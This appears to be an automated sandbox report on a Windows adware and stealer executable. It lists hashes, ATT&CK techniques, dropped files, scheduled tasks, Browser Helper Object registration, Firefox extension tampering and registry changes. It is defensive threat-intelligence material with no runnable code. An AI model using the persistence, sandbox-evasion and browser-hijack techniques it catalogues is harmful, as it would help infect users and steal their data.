fbf5bfca398911605785389a91147f5ef8e188fe0778cb2f1808ab0f0d415c88

Analysis

max time kernel
122s
max time network
135s
platform
windows10_x64
resource
win10v20210408
submitted
21-06-2021 07:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3f51026069dac5d3e1b8c085ba90a0b0.exe
Size

6.3MB
MD5

3f51026069dac5d3e1b8c085ba90a0b0
SHA1

47346fe7178785b13c1455f163cb5bcd3b66909a
SHA256

fbf5bfca398911605785389a91147f5ef8e188fe0778cb2f1808ab0f0d415c88
SHA512

2d73f4ca1838475e83ce212254dcbfce2283784433782dc5828d2244aa1095a5d13cecfedfcf31c43b08bd2f7ccab2e4710c95b3b0f36a9e3bce6d8570b1d48e

Score

10^/10

adware discovery persistence spyware stealer

Malware Config

Signatures

Registers COM server for autorun 1 TTPs
persistence

Registry Run Keys / Startup Folder
T1060
Blocklisted process makes network request 1 IoCs

Processes:

rundll32.exe

flow pid process

18 2916 rundll32.exe
Executes dropped EXE 5 IoCs

Processes:

SimplInst.exeSimplInst.exevjwjlbb.exeHgCFJXi.exeWzycSsL.exe

pid process

1108 SimplInst.exe
2400 SimplInst.exe
3992 vjwjlbb.exe
2884 HgCFJXi.exe
3680 WzycSsL.exe

flow	pid	process
18	2916	rundll32.exe

pid	process
1108	SimplInst.exe
2400	SimplInst.exe
3992	vjwjlbb.exe
2884	HgCFJXi.exe
3680	WzycSsL.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

rundll32.exeSimplInst.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	SimplInst.exe

Loads dropped DLL 1 IoCs

Processes:

rundll32.exe

pid process

2916 rundll32.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Drops desktop.ini file(s) 1 IoCs

Processes:

HgCFJXi.exe

description ioc process

File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini HgCFJXi.exe
Installs/modifies Browser Helper Object 2 TTPs
BHOs are DLL modules which act as plugins for Internet Explorer.
stealer adware

Modify Registry
T1112

Browser Extensions
T1176

pid	process
2916	rundll32.exe

description	ioc	process
File opened for modification	C:\$RECYCLE.BIN\S-1-5-18\desktop.ini	HgCFJXi.exe

Drops file in System32 directory 17 IoCs

Processes:

powershell.exepowershell.exepowershell.exerundll32.exepowershell.exepowershell.exevjwjlbb.exepowershell.exeSimplInst.exepowershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	rundll32.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5	rundll32.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	vjwjlbb.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	rundll32.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	rundll32.exe
File created	C:\Windows\system32\GroupPolicy\gpt.ini	SimplInst.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	vjwjlbb.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	rundll32.exe

Drops file in Program Files directory 64 IoCs

Processes:

HgCFJXi.exe

description	ioc	process
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{26DD0370-0637-483E-9309-99C42DDB0F66}.xpi	HgCFJXi.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\pt\messages.json	HgCFJXi.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\zh_TW\messages.json	HgCFJXi.exe
File opened for modification	C:\Program Files (x86)\VnDWhryCSIE\files\Kernel.js	HgCFJXi.exe
File created	C:\Program Files (x86)\mrDIPifxyaTU2\CbkfmaP.xml	HgCFJXi.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{26DD0370-0637-483E-9309-99C42DDB0F66}.xpi	HgCFJXi.exe
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	HgCFJXi.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\icon16.ico	HgCFJXi.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\es\messages.json	HgCFJXi.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\es_419\messages.json	HgCFJXi.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\ta\messages.json	HgCFJXi.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\tr\messages.json	HgCFJXi.exe
File created	C:\Program Files (x86)\kuGFoFUJyZFbBZdRkpR\IyiBhgN.xml	HgCFJXi.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\bg\messages.json	HgCFJXi.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\bn\messages.json	HgCFJXi.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\pt_BR\messages.json	HgCFJXi.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\kYCDidaec.dll	HgCFJXi.exe
File created	C:\Program Files (x86)\mrDIPifxyaTU2\hJtIiIBhHnUDb.dll	HgCFJXi.exe
File created	C:\Program Files (x86)\piLDiRqvGTKTC\ZCKbTfW.xml	HgCFJXi.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\background.html	HgCFJXi.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\Kernel.js	HgCFJXi.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\en_GB\messages.json	HgCFJXi.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\hi\messages.json	HgCFJXi.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\pt_PT\messages.json	HgCFJXi.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\tjjvRAW.dll	HgCFJXi.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\it\messages.json	HgCFJXi.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\mr\messages.json	HgCFJXi.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\th\messages.json	HgCFJXi.exe
File created	C:\Program Files (x86)\qDCCGhOyU\oLPvrug.xml	HgCFJXi.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\da\messages.json	HgCFJXi.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\en\messages.json	HgCFJXi.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\fil\messages.json	HgCFJXi.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\ja\messages.json	HgCFJXi.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\mO48CE.dll	HgCFJXi.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\ca\messages.json	HgCFJXi.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\cs\messages.json	HgCFJXi.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\he\messages.json	HgCFJXi.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\hu\messages.json	HgCFJXi.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\ml\messages.json	HgCFJXi.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\ar\messages.json	HgCFJXi.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\fr\messages.json	HgCFJXi.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\gu\messages.json	HgCFJXi.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\kn\messages.json	HgCFJXi.exe
File created	C:\Program Files (x86)\XpqoUDXlJoUn\pPQuani.dll	HgCFJXi.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\fi\messages.json	HgCFJXi.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\lv\messages.json	HgCFJXi.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\ro\messages.json	HgCFJXi.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\sl\messages.json	HgCFJXi.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	HgCFJXi.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\am\messages.json	HgCFJXi.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\el\messages.json	HgCFJXi.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\et\messages.json	HgCFJXi.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\id\messages.json	HgCFJXi.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\no\messages.json	HgCFJXi.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\zh_CN\messages.json	HgCFJXi.exe
File created	C:\Program Files (x86)\kuGFoFUJyZFbBZdRkpR\qzzCxcv.dll	HgCFJXi.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\be\messages.json	HgCFJXi.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\lt\messages.json	HgCFJXi.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\ms\messages.json	HgCFJXi.exe
File created	C:\Program Files (x86)\qDCCGhOyU\JIIhnD.dll	HgCFJXi.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\hr\messages.json	HgCFJXi.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\ru\messages.json	HgCFJXi.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\sq\messages.json	HgCFJXi.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\te\messages.json	HgCFJXi.exe

Drops file in Windows directory 4 IoCs

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	ioc	process
File created	C:\Windows\Tasks\bkckNrBYOjfprwtEPo.job	schtasks.exe
File created	C:\Windows\Tasks\lJLWniCkwZbjhapzm.job	schtasks.exe
File created	C:\Windows\Tasks\pMLebdOaFqOcGSU.job	schtasks.exe
File created	C:\Windows\Tasks\bAvepIylLlkyPpwct.job	schtasks.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 12 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
4064	schtasks.exe
2172	schtasks.exe
1820	schtasks.exe
4060	schtasks.exe
3552	schtasks.exe
3744	schtasks.exe
2476	schtasks.exe
2552	schtasks.exe
1448	schtasks.exe
1516	schtasks.exe
1512	schtasks.exe
3372	schtasks.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

SimplInst.exerundll32.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	SimplInst.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	SimplInst.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	rundll32.exe

Modifies Internet Explorer settings 1 TTPs 15 IoCs

adware spyware

Modify Registry

T1112

Processes:

HgCFJXi.exeWzycSsL.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\AppName = "ZCLrAUt.exe"	HgCFJXi.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy	HgCFJXi.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Approved Extensions	HgCFJXi.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\AppPath = "C:\\Program Files (x86)\\VnDWhryCSIE"	HgCFJXi.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Approved Extensions\{1A4355C3-1380-4565-8F0B-AE992134C31B} = 51667a6c4c1d3b1bd34a540ab345020f9b00e4d923778200	HgCFJXi.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	WzycSsL.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	WzycSsL.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}	HgCFJXi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\AppPath = "C:\\Program Files (x86)\\VnDWhryCSIE"	HgCFJXi.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\ZCLrAUt.exe = "9999"	HgCFJXi.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}	HgCFJXi.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\Policy = "3"	HgCFJXi.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Low Rights	HgCFJXi.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\AppName = "ZCLrAUt.exe"	HgCFJXi.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\Policy = "3"	HgCFJXi.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exeHgCFJXi.exepowershell.exepowershell.exepowershell.exerundll32.exevjwjlbb.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	HgCFJXi.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{d05cfc4a-0000-0000-0000-500600000000}	HgCFJXi.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	vjwjlbb.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	HgCFJXi.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer	HgCFJXi.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	HgCFJXi.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe

Modifies registry class 64 IoCs

Processes:

HgCFJXi.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\InprocServer32	HgCFJXi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}\1.0\0	HgCFJXi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}\1.0\FLAGS	HgCFJXi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\InprocServer32\ = "C:\\Program Files (x86)\\VnDWhryCSIE\\tjjvRAW.dll"	HgCFJXi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\InprocServer32\ThreadingModel = "Apartment"	HgCFJXi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\ = "{601F87D8-13CD-4AEA-83DA-960D9654B38D}"	HgCFJXi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}\1.0\HELPDIR	HgCFJXi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\ProgID = "Toolbar.ExtensionHelperObject.1"	HgCFJXi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}	HgCFJXi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}	HgCFJXi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\ = "_jeBzlVqRuIGFOqQBwZkYGeuXGR"	HgCFJXi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\ = "_jeBzlVqRuIGFOqQBwZkYGeuXGR"	HgCFJXi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}"	HgCFJXi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}	HgCFJXi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\LocalServer32	HgCFJXi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}\1.0\0\win32	HgCFJXi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}\1.0\0\win32\ = "C:\\Program Files (x86)\\VnDWhryCSIE\\ZCLrAUt.exe"	HgCFJXi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\TypeLib\Version = "1.0"	HgCFJXi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\TypeLib\Version = "1.0"	HgCFJXi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}\1.0\0\win32	HgCFJXi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\Programmable\	HgCFJXi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\ProxyStubClsid32	HgCFJXi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}	HgCFJXi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\TypeLib\ = "{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}"	HgCFJXi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Implemented Categories	HgCFJXi.exe
